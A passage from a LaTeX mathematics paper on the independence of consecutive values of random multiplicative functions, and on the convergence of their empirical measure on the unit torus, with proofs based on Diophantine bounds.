$([\log (n+k)/\log(2)]^{|A|}) |A|^{|A|/2}$. Since $|A| \leq \pi(k)$, we deduce, after multiplying by $\det
(M^{(\mathcal{Q})})$,
that there exists a linear dependence between $\log (n+1), \dots, \log (n+k)$ involving only
integers of absolute value at most $D := [\sqrt{\pi(k)} \log (n+k)/\log2]^{\pi(k)}$:
let us keep the notation of \eqref{1} for this dependence.
Let $q$ be the smallest nonnegative integer such that $\sum_{j=1}^k j^q m_j \neq 0$: from the fact that the
Vandermonde matrices are invertible, one deduces that $q \leq k-1$. Using the fact that
$$\left| \log(n+j) - \left( \log n + \sum_{r = 1}^{q} (-1)^{r-1} \frac{j^r}{r n^r} \right) \right|
\leq \frac{j^{q+1}}{(q+1) n^{q+1}},$$
we deduce, by writing the dependence above:
$$ \left| \sum_{j=1}^k j^q m_j \right| \frac{1}{q n^q} \leq \sum_{j=1}^k \frac{|m_j| j^{q+1}}{(q+1) n^{q+1}}$$
if $q \geq 1$ and
$$ \left| \sum_{j=1}^k m_j \right| \log n \leq \sum_{j=1}^k \frac{|m_j| j}{n}$$
if $q = 0$.
Since the first factor in the left-hand side of these inequalities is a non-zero integer, it is at least $1$.
From the bounds we have on the $m_j$'s, we deduce
$$ \frac{1}{q n^q} \leq \frac{ D k^{q+2}}{(q+1) n^{q+1}}$$
for $q \geq 1$ and
$$ \log n \leq \frac{ D k^2}{n}.$$
for $q = 0$. Hence
$$1 \leq \left(\frac{q}{q+1} \vee \frac{1}{\log n} \right) \frac{ D k^{q+2}}{n} \leq \frac{ D k^{q+2}}{n}$$
if $n \geq 3$, which implies, since $q \leq k-1$,
$$n \leq D k^{k+1} \leq [\sqrt{\pi(k)} \log (n+k)/\log2]^{\pi(k)} k^{k+1}.$$
If $n \geq k \vee 3$, we deduce
$$ 2 n \leq 2 [\sqrt{\pi(k)} \log (2n)/\log2]^{\pi(k)} k^{k+1},$$
i.e.
$$ \frac{2n}{[\log (2n)]^{\pi(k)}} \leq 2 [\sqrt{\pi(k)}/\log2]^{\pi(k)} k^{k+1}
.$$
Now, one has obviously $\pi(k) \leq 2k/3$ for all $k \geq 2$, and then
$\sqrt{\pi(k)}/\log 2 \leq \sqrt{2 k}$ for all integers $k \geq 2$, and more accurately, it is known that
$(\pi(k) \log k )/k$, which tends to $1$ at infinity by the prime number theorem, reaches its maximum at $k = 113$.
Hence,
$$\frac{2n}{[\log (2n)]^{\pi(k)}}
\leq 2 (2 k)^{c k /\log k} k^{k+1}$$
where
$$c = \frac{1}{2} \, \frac{\pi(113) \log 113}{113} \leq 0.63$$
and then
$$\frac{2n}{[\log (2n)]^{\pi(k)}}
\leq 2 ( 2^{0.63 k/ \log 2}) k^{0.63 k/\log k} k^{k+1} \leq 2 e^{1.26 k} k^{k+1}
\leq (e^{1.26} k)^{k+1} \leq (3.6 k)^{k+1}.$$
Let us assume that $2n \geq (100k)^{k+1}$. The function
$x \mapsto x/\log^{\pi(k)}(x)$ is increasing
for $x \geq e^{\pi(k)}$. Moreover, by
studying the function $x \mapsto
\log \log (100 x) / \log (x+1)$ for $x \geq 2$, we check that $\log (100k) \leq (k+1)^{1.52}$ for all $k \geq 2$. Hence, since $\pi(k) \leq \pi(k+1)$,
$$\frac{2n}{[\log (2n)]^{\pi(k)}}
\geq \frac{(100k)^{k+1}}{
((k+1)\log (100k))^{\pi(k)}}
\geq \frac{(100k)^{k+1}}{(k+1)^{2.52 \pi(k+1)}}
$$ $$\geq \frac{(100k)^{k+1}}{(k+1)^{(2.52)(1.26) (k+1)/\log(k+1)}}
\geq (100 k e^{-3.18})^{k+1} \geq (4 k)^{k+1},$$
which contradicts the previous inequality.
Hence,
$$n \leq 2n \leq (100k)^{k+1},$$
and this bound is of course also available for $n \leq k \vee 3$.
\end{proof}
This result implies that theoretically, for fixed $k$, one can find all the values of $n$ such that $(X_{n+1}, \dots, X_{n+k})$ are not independent by brute force computation. In practice, the bound we have obtained is far from optimal, and is too poor to be directly useable except for very small values of $k$, for which a more careful reasoning can solve the problem directly. Here is an example for $k=5$:
\begin{proposition}
For $n \geq 1$, the variables $(X_{n+1},X_{n+2}, X_{n+3}, X_{n+4}, X_{n+5})$ are independent except if $n \in \{1,2,3,4,5,7\}$.
\end{proposition}
\begin{proof}
If $\prod_{j=1}^5 (n+j)^{m_j} = 1$ with integers $m_1, \dots m_5$ not all equal to zero,
then $m_j = 0$ as soon as $n+j$ has a prime factor larger than or equal to $5$: otherwise, this prime factor cannot be cancelled by the factors $(n+k)^{m_k}$ for $k \neq j$. Hence, the values of $n+j$ such that $m_j \neq 0$ have only prime factors $2$ and $3$, and at most one of them has both factors since it should then be divisible by $6$. Moreover, if $n \geq 4$, there can be at most one power of $2$ and one power of $3$ among $n+1, \dots, n+5$.
One deduces that dependence is only possible if among $n+1, \dots, n+5$, there are three numbers, respectively of the form
$2^k, 3^\ell, 2^r.3^s$, for integers $k, \ell, r, s > 0$. The quotient between two of these integers is between $1/2$ and $2$ since we here assume $n \geq 4$. Hence, $2^k \geq 2^r.3^s /2 \geq
2^r$ and then $k \geq r$. Similarly,
$3^{\ell} \geq 2^r.3^s /2 \geq 3^s$, which implies $\ell \geq s$. The numbers $2^k$ and $2^r.3^s$ are then both divisible by
$2^r$; since they differ by at most $4$,
$r \leq 2$. The numbers $3^{\ell}$ and
$2^r.3^s$ are both divisible by $3^s$, and then $s \leq 1$. Therefore,
$2^r.3^s \leq 12$ and $n \leq 11$.
By checking case by case the values of $n$ smaller than or equal to $11$, we get the desired result.
\end{proof}
The results above give an upper bound, for fixed $k$, of the maximal value of
$n$ such that $(X_{n+1}, \dots, X_{n+k})$ are not independent. By considering two consecutive squares and their geometric mean, whose logarithms are linearly dependent, one deduces the lower bound
$ ([k/2]-1)^2 - 1 \geq (k-1)(k-5)/4$ for the maximal $n$.
As written in a note by Dubickas \cite{D}, this bound can be improved to a quantity equivalent to $(k/4)^3$,
by considering the identity:
$$(n^3 - 3n - 2)(n^3 - 3n +2) n^3
= (n^3 - 4n)(n^3 - n)^2.$$
In \cite{D}, as an improvement of a result of \cite{T}, it is also shown that for all $\epsilon > 0$, the lower bound
$e^{\log^2 k /[(4 + \epsilon) \log \log k]}$ occurs for infinitely many values of $k$.
A computer search
gives, for $k$ between $3$ and $13$, and
$n \leq 1000$, the following largest values for which we do not have independent variables: 1, 5, 7, 14, 23, 24, 47, 71, 71, 71, 239. For example, if $k = 13$ and $n = 239$, the five integers $240, 243, 245, 250, 252$ have only the four prime factors $2, 3, 5, 7$, so we necessarily have a dependence, namely:
$$240^{65} \cdot 243^{31} \cdot
245^{55} \cdot 250^{-40} \cdot
252^{-110} = 1.$$
It would remain to check if there are dependences for $n > 1000$.
\section{Independence in the case of roots of unity} \label{uniformq}
We now suppose that
$(X_p)_{p \geq 1}$ are i.i.d., uniform on the set of $q$-th roots of unity, $q \geq 1$ being a fixed integer. If $q = 2$, we get symmetric Bernoulli random variables.
For all integers $s \geq 2$, we will denote
by $\mu_{s,q}$ the largest divisor $d$ of
$q$ such that $s$ is a $d$-th power.
The analog of
Lemma \ref{1.1} in the present setting is the following:
\begin{lemma}
For $n, k \geq 1$, the variables
$(X_{n+1}, \dots, X_{n+k})$ are all
uniform on the set of $q$-th roots of unity if and only if $\mu_{n+j,q} = 1$ for all $j$ between $1$ and $k$. They are
independent if and only if
the only $k$-uple $(m_1, \dots, m_k)$,
$0 \leq m_j < q/ \mu_{n+j,q}$ such that
$$\forall p \in \mathcal{P}, \sum_{j=1}^n m_j v_p (n+j)
\equiv 0 \, (\operatorname{mod. } q)$$
is $(0,0,\dots,0)$.
\end{lemma}
\begin{proof}
For any $s \geq 2$, $\ell \in \mathbb{Z}$, we have
$$\mathbb{E}[X_s^\ell] =
\prod_{p \in \mathcal{P}} \mathbb{E} [X_p^
{\ell v_p(s)}],$$
which is equal to $1$ if
$\ell v_p(s)$ is divisible by $q$ for all $p \in \mathcal{P}$, and to $0$ otherwise.
The condition giving $1$ is equivalent
to the fact that $\ell$ is a multiple
of $ q/(\operatorname{gcd}(q, (v_p(s))_{p \in \mathcal{P}})$, which is $q/\mu_{s,q}$.
Hence, $X_s$ is a uniform $(q/\mu_{s,q})$-th root of unity, which implies the first part of the proposition.
The variables $(X_{n+1}, \dots, X_{n+k})$ are independent if and only if for all $m_1, \dots, m_k \in \mathbb{Z}$,
$$ \mathbb{E} \left[ \prod_{j=1}^k
X_{n+j}^{m_j} \right]
= \prod_{j=1}^k \mathbb{E}[ X_{n+j}^{m_j} ].$$
Since $X_{n+j}$ is a uniform $(q/\mu_{n+j,q})$-th root of unity, both sides of the equality depend only on the values of $m_j$ modulo $q/\mu_{n+j,q}$ for $1 \leq j \leq k$. This implies that we can assume, without loss of generality, that $0 \leq m_j < q/\mu_{n+j,q}$ for all $j$. If all the $m_j$'s are zero, both sides are obviously equal to $1$. Otherwise, the right-hand side is equal to zero, and then we have independence if and only if it is also the case of the left-hand side, i.e. for all
$(m_1, \dots, m_k) \neq (0,0, \dots, 0)$,
$0 \leq m_j < q/\mu_{n+j,q}$,
$$\mathbb{E} \left[ \prod_{j=1}^k
X_{n+j}^{m_j} \right]
= \mathbb{E} \left[ \prod_{p \in \mathcal{P}} X_p^{\sum_{1 \leq j \leq k}
m_j v_p(n+j)} \right]
= \prod_{p \in \mathcal{P}}
\mathbb{E} \left[ X_p^{\sum_{1 \leq j \leq k}
m_j v_p(n+j)} \right] = 0,$$
which is true if and only if
$$\exists p \in \mathcal{P}, \sum_{j=1}^n m_j v_p (n+j)
\not\equiv 0 \, (\operatorname{mod. } q).$$
\end{proof}
We then have the following result, similar to Proposition \ref{1.2}:
\begin{proposition}
For fixed $k, q \geq 1$, there exists an explicitely computable $n_0(k,q)$ such that $(X_{n+1}, \dots, X_{n+k})$ are independent as soon as $n \geq n_0(k,q)$.
\end{proposition}
The bound $n_0(k,q)$ can be deduced from bounds on the solutions of certain diophantine equations which are available in the literature: we do not take care of its precise value, which is anyway far too large to be of any use if we want to find in practice the values of $n$ such that $(X_{n+1}, \dots, X_{n+k})$ are not independent.
\begin{proof}
For each value of $n \geq 1$ such that
$(X_{n+1}, \dots, X_{n+k})$ are dependent,
there exist $0 \leq m_j < q/\mu_{n+j,q}$, not all zero, such that
$$\forall p \in \mathcal{P}, \sum_{j=1}^n m_j v_p (n+j)
\equiv 0 \, (\operatorname{mod. } q).$$
There are finitely many choices, depending only on $k$ and $q$, for
the $k$-uples $(\mu_{n+j,q})_{1 \leq j \leq k}$ and
$(m_j)_{1 \leq j \leq k}$, so it is sufficient to show that the values of $n$ corresponding to each
choice of $k$-uples is bounded by an explicitely computable quantity.
At least two of the $m_j$'s are non-zero: otherwise $m_j v_p(n+j)$ is divisible by
$q$ for all $p \in \mathcal{P}$, $j$ being the unique index such that $m_j \neq 0$, and then $m_j$ is divisible by $q/\mu_{n+j,q}$: this contradicts the inequality
$0 < m_j < q/\mu_{n+j,q}$.
On the other hand, if $p$ is a prime larger than $k$, at most one of the terms
$m_j v_p(n+j)$ is non-zero, and then
all the terms are divisible by $q$, since
it is the case for their sum.
We deduce that $n+j$ is the product of a power of order $\rho_j := q/\operatorname{gcd}(m_j,q)$
and a number $A_j$ whose prime factors are all
smaller than $k$. Moreover, on can assume
that $A_j$ is "$\rho_j$-th power free", i.e. that all its $p$-adic valuations
are strictly smaller than $\rho_j$.
Hence there exist
$$A_j \leq \prod_{p \in \mathcal{P},
p \leq k} p^{\rho_j - 1} \leq (k!)^q$$
and an integer $B_j \geq 1$ such that
$n+j = A_j B_j^{\rho_j}$.
The value of the exponents $\rho_j$ are
fixed by the $m_j$'s, and at least two
of them are strictly larger than $1$, since at least two of the $m_j$'s are non-zero. Let us first assume that there exist distinct $j$ and $j'$ such that $\rho_j \geq 2$ and $\rho_{j'} \geq 3$.
One finds an explicitly computable bound on $n$ in this case as soon of we find an explicitly computable bound for the solutions of each diophantine equation in $x$ and $z$:
$$A z^{\rho_j} - A' x{^{\rho_{j'}}} = d$$
for each $A, A', d$ such that $1 \leq A, A' \leq (k!)^q$ and $-k < d < k$, $d \neq 0$.
These equations can be rewritten as: $y^{\rho_j} = f(x)$, where $y = Az$ and
$$f(x) = A^{\rho_j - 1} (A'x^{\rho_{j'}} + d).$$
This polynomial has all simple roots (the
$\rho_{j'}$-th roots of $-d/A'$) and then
at least two of them; it has at least three if $\rho_j = 2$ since $\rho_{j'}$ is supposed to be at least $3$ in this case.
By a result of Baker \cite{B}, all the solutions are bounded by an explicitly computable quantity, which gives the desired result (the same result with an ineffective bound was already proven by Siegel).
In remains to deal with the case where $\rho_j = 2$ for all $j$ such that $m_j \neq 0$. In this case, $q$ is even and $m_j$ is divisible by $q/2$, which implies that $m_j = q/2$ when $m_j \neq 0$. By looking at the prime factors larger than $k$, one deduces that for all $j$ such that $m_j \neq 0$,
$m_j$ is a square times a product of distinct primes smaller than or equal to $k$. If at least three of the $m_j$'s are non-zero, it then suffices to find an explicitly computable bound for the solutions of each system of diophantine equations:
$$ B y^2 = A t^2 + d_1, C z^2 = A t^2 + d_2$$
for $1 \leq A, B, C \leq k!$ squarefree, $-k < d_1, d_2 < k$, $d_1, d_2, d_1 - d_2 \neq 0$.
From these equations, we deduce, for $x = BC yz$:
$$x^2 = BC (At^2 + d_1)(At^2 + d_2).$$
The four roots of the right-hand side are the square roots of $-d_1/A$ and $-d_2/A$, which are all distinct since $d_1 \neq d_2$, $d_1 \neq 0$, $d_2 \neq 0$. Again by Baker's result, one deduces that the solutions are explicitly bounded, which then gives an explicit bound for $n$.
The remaining case is when exactly two of the $m_j$'s are non-zero, with $\rho_j = 2$, and then $m_j = q/2$.
The dependence modulo $q$ then means that
$(n+j)(n+j')$ is a square for distinct $j, j'$ between $1$ and $k$, which implies that
$(n+j)/g$ and $(n+j')/g$ are both squares
where $g = \operatorname{gcd}(n+j, n+j')$.
These squares have difference smaller than $k$, which implies that they are smaller than $k^2$. Moreover, $g$ divides $|j-j'| \leq k$, and then $g \leq k$, which gives $n \leq k^3$.
\end{proof}
Here, we explicitly solve a particular case:
\begin{proposition}
For $q = 2$, $(X_{n+1}, \dots, X_{n+5})$ are independent for all $n \geq 2$ and not for $n=1$.
\end{proposition}
\begin{proof}
A dependence means that there exists a product
of distinct non-square factors among $n+1, \dots, n+5$ which is a square.
For a prime $p \geq 5$, at most one $p$-adic valuation is non-zero, which implies that all the $p$-adic valuations are even.
Hence, the factors involved in the product are all squares multiplied by $2, 3$ or $6$. Since they differ by at most $4$, they cannot be in the same of the three "categories", which implies, since the product is a square, that there exist three numbers, respectively of the form $2x^2$, $3y^2$, $6z^2$, in the interval between $n+1$ and $n+5$. Now, Hajdu and Pint\'er \cite{HP} have determined all the triples of distinct integers in intervals of length at most 12 whose product is a square. For length $5$, the only positive triple is $(2,3,6)$, which implies that the only dependence in the present setting is $X_2 X_3 X_6 = 1$.
\end{proof}
\begin{remark}
The list given in \cite{HP} shows that for $q = 2$, there are dependences for quite large values of $n$ as soon as $k \geq 6$. For example,
we have $X_{240} X_{243} X_{245} = 1$ for $k =6$ and $X_{10082}X_{10086}X_{10092} = 1$ for $k = 11$.
\end{remark}
\section{Convergence of the empirical measure in the uniform case} \label{uniform2}
In this section, $(X_p)_{p \in \mathcal{P}}$ are uniform on the unit circle, and $k \geq 1$ is a fixed integer. For $N \geq 1$, we consider the empirical measure of the $N$ first $k$-uples:
$$\mu_{k,N} := \frac{1}{N}\sum_{n=1}^N
\delta_{(X_{n+1}, \dots X_{n+k})}.$$
It is reasonnable to expect that $\mu_{k,N}$ tends to the uniform distribution on $\mathbb{U}^k$, which is the common distribution of
$(X_{n+1}, \dots X_{n+k})$ for all but finitely many values of $n$.
In order to prove this result, we will estimate the second moment of the Fourier transform of $\mu_{k,N}$, given by
$$\hat{\mu}_{k,N}(m_1, \dots, m_k)
= \int_{\mathbb{U}^k} \prod_{j=1}^k
z_j^{m_j} d\mu_{k,N} (z_1, \dots, z_k).$$
\begin{proposition} \label{momentorder2}
Let $m_1, \dots, m_k$ be integers, not all
equal to zero. Then, for all $N > N' \geq 0$,
$$\mathbb{E} \left[
\left|\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j} \right|^2 \right]
\leq k (N-N') $$
and there exists $C_{m_1, \dots, m_k} \geq 0$, independent of $N$ and $N'$, such that
$$N-N' \leq \mathbb{E} \left[
\left|\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j} \right|^2 \right]
\leq N - N' + C_{m_1, \dots, m_k}.$$
Moreover, under the same assumption,
$$\mathbb{E} \left[ |\hat{\mu}_{k,N}(m_1, \dots, m_N)|^2
\right] \leq \frac{k}{N},$$
$$\frac{1}{N} \leq \mathbb{E} \left[ |\hat{\mu}_{k,N}(m_1, \dots, m_N)|^2
\right] \leq \frac{1}{N} + \frac{C_{m_1, \dots, m_k}}{N^2}.$$
Finally, for $k \in \{1,2\}$, one can take
$C_{m_1}$ or $C_{m_1, m_2}$ equal to $0$,
and for $k = 3$, one can take
$C_{m_1, m_2,m_3} = 2$ if $(m_1,m_2,m_3)$ is proportional to $(2,1,-4)$ and $C_{m_1,m_2,m_3} = 0$ otherwise.
\end{proposition}
\begin{proof}
We have, using the completely multiplicative extension of $X_r$ to all $r \in \mathbb{Q}_+^*$:
$$\mathbb{E} \left[
\left|\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j} \right|^2 \right]
= \sum_{N' < n_1, n_2 \leq N}
\mathbb{E} \left[X_{\prod_{j=1}^{k}
(n_1 + j)^{m_j} / (n_2 + j)^{m_j} } \right],$$
and then the left-hand side is equal to the number of couples $(n_1, n_2)$
in $\{N'+1, \dots, N\}^2$ such that
\begin{equation}\prod_{j=1}^k (n_1 + j)^{m_j}
= \prod_{j=1}^k (n_2 + j)^{m_j}.
\label{n1n2}
\end{equation}
The number of trivial solutions $n_1 = n_2 $ of this equation is equal to $N - N'$, which gives a lower bound on the second moment we have to estimate.
On the other hand, the derivative of the rational fraction $\prod_{j=1}^k (X + j)^{m_j}$ can be written as the product of $\prod_{j=1}^k (X + j)^{m_j - 1}$, which is strictly positive on $\mathbb{R}_+$, by the
polynomial
$$Q(X) = \prod_{j=1}^k (X+j) \left[
\sum_{j=1}^k \frac{m_j}{X + j} \right].$$
The polyomial $Q$ has degree at most $k-1$ and is non-zero, since $(m_1, \dots, m_k)
\neq (0, \dots, 0)$ and then $\prod_{j=1}^k
(X+j)^{m_j}$ is non-constant.
We deduce that $Q$ has at most $k-1$ zeros, and then on $\mathbb{R}_+$, $\prod_{j=1}^k (X+j)^{m_j}$ is strictly monotonic on each of at most $k$ intervals of $\mathbb{R}_+$, whose bounds are $0$, the positive zeros of $Q$ and $+\infty$. Hence, for each choice of $n_1$, there are at most $k$ values of $n_2$
satisfying \eqref{n1n2}, i.e. at most one in each interval, which gives the upper bound $k(N-N')$ for the moment we are estimating.
Moreover, since $\prod_{j=1}^k (X+j)^{m_j}$ is strictly monotonic on an interval
of the form $[A, \infty)$ for some $A > 0$, we deduce that for any non-trivial
solution $(n_1,n_2)$ of \eqref{n1n2}, the minimum of $n_1$ and $n_2$ is at most $A$.
Hence, there are finitely many possibilities for the common value of the two sides of
\eqref{n1n2}, and for each of these values, at most $k$ possibilities for $n_1$ and for $n_2$. Hence, for fixed $(m_1, \dots, m_k)$, the total number of non-trivial solutions of \eqref{n1n2} is finite, which gives the bound $N-N'+ C_{m_1, \dots, m_k}$ of the proposition.
The statement involving the empirical measure is deduced by taking $N' = 0$ and by dividing everything by $N^2$.
The claim for $k \leq 3$ is an immediate consequence of the following statement we will prove now: the only integers $n_1 > n_2 \geq 1$, $(m_1,m_2,m_3) \neq (0,0,0)$,
such that \begin{equation}
(n_1+1)^{m_1} (n_1+2)^{m_2}
(n_1+3)^{m_3} = (n_2+1)^{m_1} (n_2+2)^{m_2}
(n_2+3)^{m_3} \label{n1n22}
\end{equation}
are $n_1 = 7$, $n_2 = 2$, $(m_1,m_2,m_3)$ proportional to $(2,1,-4)$, which corresponds to the equality: $$
8^2 \cdot 9 \cdot 10^{-4} = 3^2 \cdot 4 \cdot 5^{-4}.$$
If $m_1, m_2, m_3$ have the same sign and are not all zero, $(n+1)^{m_1}(n+2)^{m_2}
(n+3)^{m_3}$ is strictly monotonic in $n \geq 1$, and then we cannot get a solution of \eqref{n1n22} with $n_1 > n_2$.
By changing all the signs if necessary, we may assume that one of the integers $m_1, m_2,m_3$ is strictly negative and the others are nonnegative. For $n \geq 1$,
the fraction obtained by writing
$(n+1)^{m_1}(n+2)^{m_2}
(n+3)^{m_3}$ can only be simplified by prime
factors dividing two of the integers $n+1, n+2, n+3$, and then only by a power of $2$.
If $m_2 < 0$ and then $m_1, m_3 \geq 0$, the numerator and the denominator have different parity, and then the fraction is irreducible for all $n$: we do not get any solution of \eqref{n1n22} in this case.
Otherwise, $m_1$ or $m_3$ is strictly negative. If $(n_1, n_2)$ solves \eqref{n1n22}, let us define $s := 1$ and $j := n_2 + 1$ if $m_1 < 0$, and $s := -1$ and $j := n_2 + 3$ if $m_3 < 0$.
The denominators of the two fractions corresponding to the two sides of \eqref{n1n22} are respectively a power of
$j$ and the same power of $n_1 + 2 - s$: if \eqref{n1n22} is satisfied, these denominators should differ only by a power of $2$, since the fractions can be only simplified by such a power.
Hence, $n_1 + 2 - s = 2^{\ell} j$ for some $\ell \geq 0$, and by looking at the numerators of the fractions, we deduce that there exists $r \geq 0$ such that
$$2^r (j+s)^{m_2} (j+2s)^{m_{2 + s}}
= (2^{\ell}j+s)^{m_2} (2^{\ell}j+2s)^{m_{2 + s}}.$$
If $\ell \geq 2$, the ratios
$(2^{\ell}j+s)/(j+s)$ and
$(2^{\ell}j+2s)/(j+2s)$ are at least
$(4\cdot2 + 2)/(2 + 2) = 5/2$ since $j \geq n_2 +1 \geq 2$ and $|2s| \leq 2$, and then
the ratio between the right-hand side
and the left-hand side of the previous equality is at least $(5/2)^{m_{2 + s} + m_2} 2^{-r}$,
which gives
$$ 2^r \geq (5/2)^{m_{2 + s} + m_2}.$$
On the other hand, the $2$-adic valution
of the right-hand side is $m_{2+s}$ since
$2^{\ell} j + 2s \equiv 2$ modulo 4, whereas the valuation of the left-hand side is at least $r$, which gives
$$ 2^r \leq 2^{m_{2+s}}.$$
We then get a contradiction for $\ell \geq 2$, except in the case $m_{2+s} = m_2 = 0$,
where we aleardy know that there is no solution of \eqref{n1n22}.
If $\ell = 1$, we get
$$2^r (j+s)^{m_2} (j+2s)^{m_{2 + s}}
= (2j+s)^{m_2} (2j+2s)^{m_{2 + s}}.$$
In this case, the prime factors of $2j+s$, which are odd ($|s| = 1$), should divide $j+s$ or $j+2s$, then $2j+2s$ or $2j+4s$, and finally $s$ or $3s$. Hence, $2j+s$ is a power of $3$.
Similarly, the odd factors of $j+2s$, and then of $2j + 4s$, should divide $2j+s$ or $2j+2s$, and then $s$ or $3s$: $2j+4s$ is the product of a power of $2$ and a power of $3$.
If we write $2j+s = 3^a$, $2j + 4s = 2^b 3^c$, we must have $|3^a - 2^b 3^c| = 3$.
If $a \leq 1$, we have $2j + s \leq 3$. If $s = 1$, we get $n_2 + 1 = j \leq 1$, and if $s = -1$, we get $n_2 + 3 = j \leq 2$, which is impossible.
If $a \geq 2$, $3^a$ is divisible by $9$, and then $2^b 3^c$ is congruent to $3$ or $6$ modulo $9$, which implies $c = 1$, and then $|3^{a-1} - 2^b| = 1$. Now, by induction, one proves that the order of $2$ modulo $3^{a-1}$ is equal to $2.3^{a-2}$ (i.e. $2$ is a primitive root modulo the powers of $3$), and this order should divide $2b$, which implies that $b \geq 3^{a-2}$ ($b = 0$ is not possible) and then
$2^{3^{a-2}} \leq 3^{a-1} + 1$, which implies $a \in \{2,3\}$.
If $a = 2$ and $s = 1$, we get $2j+1 = 9$,
$j= 4$, and then $n_1 = 7$, $n_2 = 3$.
We should solve $4^{m_1} 5^{m_2} 6^{m_3} =
8^{m_1} 9^{m_2} 10^{m_3}$. Taking the $3$-adic valuation gives $m_3 = 2 m_2$, taking the $5$-adic valuation gives $m_3 = m_2$, and then $m_2 = m_3 = 0$, which implies $m_1 = 0$.
If $a = 2$ and $s = -1$, we get $2j - 1 = 9$, $j=5$, $n_1 = 7$, $n_2 = 2$, which gives the equation $3^{m_1} 4^{m_2} 5^{m_3} =
8^{m_1} 9^{m_2} 10^{m_3}$.
Taking the $2$-adic valuation gives $2m_2 = 3m_1 + m_3$, taking the $3$-adic valuation gives $m_1 = 2 m_2$, and then $(m_1,m_2,m_3)$ should be proportional to $(2,1,-4)$: in this case, we get one of the solutions already mentioned.
If $a = 3$, $2^b$ should be $8$ or $10$, and then $b = 3$, $2j+ s = 27$, $2j + 4s = 24$, $j = 14$, $s = -1$, $n_1 = 25$, $n_2 = 11$. We have to solve $12^{m_1} 13^{m_2} 14^{m_3} = 26^{m_1} 27^{m_2} 28^{m_3}$.
Taking the $3$-adic valuation gives $m_1 = 3m_2$, taking the $13$-adic valuation gives $m_1 = m_2$, and then $m_1 = m_2 = m_3 = 0$.
\end{proof}
\begin{corollary}
For all $(m_1, \dots, m_k) \in \mathbb{Z}^k$, $\hat{\mu}_{k,N}(m_1, \dots, m_k)$ converges
in $L^2$, and then in probability, to $\mathds{1}_{m_1 = \dots = m_k = 0}$, i.e. to the corresponding Fourier coefficient of the uniform distribution $\mu_{k}$ on $\mathbb{U}^k$. In other words, $\mu_{k,N}$ converges weakly in probability to $\mu_{k}$.
\end{corollary}
In this setting, we also have a strong law of large numbers, with an estimate of the
rate of convergence, for sufficiently smooth test functions. Before stating the corresponding result, we will show the following lemma, which will be useful:
\begin{lemma} \label{lemmaLLN}
Let $\epsilon > \delta \geq 0$, $C > 0$, and let $(A_n)_{n \geq 0}$ be a sequence of
random variables such that $A_0 = 0$ and
for all $N > N' \geq 0$,
$$\mathbb{E}[|A_{N} - A_{N'}|^2]
\leq C (N-N')N^{2 \delta}.$$
Then, almost surely, $A_N = O(N^{1/2 + \epsilon})$: more precisely, we have for $M > 0$,
$$\mathbb{P} \left(\sup_{N \geq 1}
|A_N|/(N^{1/2 + \epsilon}) \geq M
\right) \leq K_{\epsilon, \delta} C M^{-2},$$
where $K_{\epsilon, \delta} > 0$ depends
only on $\delta$ and $\epsilon$.
\end{lemma}
\begin{proof}
For $\ell, q \geq 0$, $M > 0$ and $\epsilon' := (\delta + \epsilon)/2
\in (\delta, \epsilon)$, we have:
\begin{align*}\mathbb{P} \left(|A_{(2\ell + 1).2^q} -
A_{(2\ell).2^q}| \geq M [(2\ell + 1).2^q]^{1/2 + \epsilon'} \right)
& \leq M^{-2} [(2\ell + 1).2^q]^{-1 -2 \epsilon'}
\mathbb{E} \left[|A_{(2\ell + 1).2^q} -
A_{(2\ell).2^q}|^2\right]
\\ & \leq M^{-2}.C.2^q.[(2\ell + 1).2^q]^{2 \delta -1 -2 \epsilon'}
\\ & \leq M^{-2}.C.2^{-2q (\epsilon' - \delta)}
(2\ell + 1)^{-1 - 2 (\epsilon' - \delta)}.
\end{align*}
Since $\epsilon' > \delta$, we deduce that
none of the events above occur with probability at least $1 - D CM^{-2}$, where $D$ depends only on $\epsilon'$ and $\delta$, and then only on $\delta$ and $\epsilon$.
In this case, we have
$$ |A_{(2\ell + 1).2^q} -
A_{(2\ell).2^q}| \leq M [(2\ell + 1).2^q]^{1/2 + \epsilon'}$$
for all $\ell, q \geq 0$.
Now, if we take the binary expansion $N = \sum_{j=0}^{\infty} \delta_j
2^j$
with $\delta_j \in \{0,1\}$, and if $N_r
= \sum_{j=r}^{\infty} \delta_j 2^j$ for all $r \geq 0$, we get $|A_{N_r} - A_{N_{r+1}}|
= 0$ if $\delta_r = 0$, and
\begin{align*} |A_{N_r} - A_{N_{r+1}}|
& = |A_{2^r (2 (N_{r+1}/2^{r+1}) + 1)}
- A_{2^r (2 N_{r+1}/2^{r+1})}|
\\ & \leq M[2^r (2( N_{r+1}/2^{r+1}) + 1)]^{1/2 + \epsilon'}
= M (N_r)^{1/2 + \epsilon'} \leq M N^{1/2 + \epsilon'}
\end{align*}
if $\delta_r = 1$. Adding these inequalities from $r = 0$ to $\infty$, we deduce that $|A_N| \leq M \mu(N) N^{1/2
+ \epsilon'}$, where $\mu(N)$ is the number of $1$'s in the binary expansion of $N$. Hence,
$$|A_N| \leq M \left(1 + (\log N/\log 2)
\right) N^{1/2 + \epsilon'}
< B M N^{1/2 + \epsilon} ,$$
where $B > 0$ depends only on $\epsilon'$ and $\epsilon$ (recall that $\epsilon > \epsilon'$), and then only on $\delta$ and $\epsilon$.
We then have, for $M' := BM$:
$$\mathbb{P} \left(\exists N \geq 1,
|A_N| \geq M' N^{1/2 + \epsilon} \right)
\leq D C M^{-2} = D C B^{2} (M')^{-2},$$
which gives the desired result after replacing $M'$ by $M$.
\end{proof}
From this lemma, we deduce the following:
\begin{proposition}
Almost surely, $\mu_{k,N}$ weakly converges to $\mu_k$. More precisely, the following holds with probability one: for all $u > k/2$, for all continuous functions $f$ from
$\mathbb{U}^k$ to $\mathbb{C}$ such that
$$\sum_{m \in \mathbb{Z}^k} |\hat{f}(m)|
\, ||m||^{u} < \infty,$$
$|| \cdot ||$ denoting any norm on
$\mathbb{R}^k$,
and for all $\epsilon > 0$,
$$\int_{\mathbb{U}^k} f d \mu_{k,N}
= \int_{\mathbb{U}^k} f d \mu_{k}
+ O(N^{-1/2 + \epsilon}).$$
\end{proposition}
\begin{remark}
By Cauchy-Schwarz inequality, we have
$$\sum_{m \in \mathbb{Z}^d}
|\hat{f}(m)| (1+||m||)^{u}
\leq \left(\sum_{m \in \mathbb{Z}^d}
|\hat{f}(m)|^2 (1 + ||m||)^{4u} \right)^{1/2}
\left(\sum_{m \in \mathbb{Z}^d}
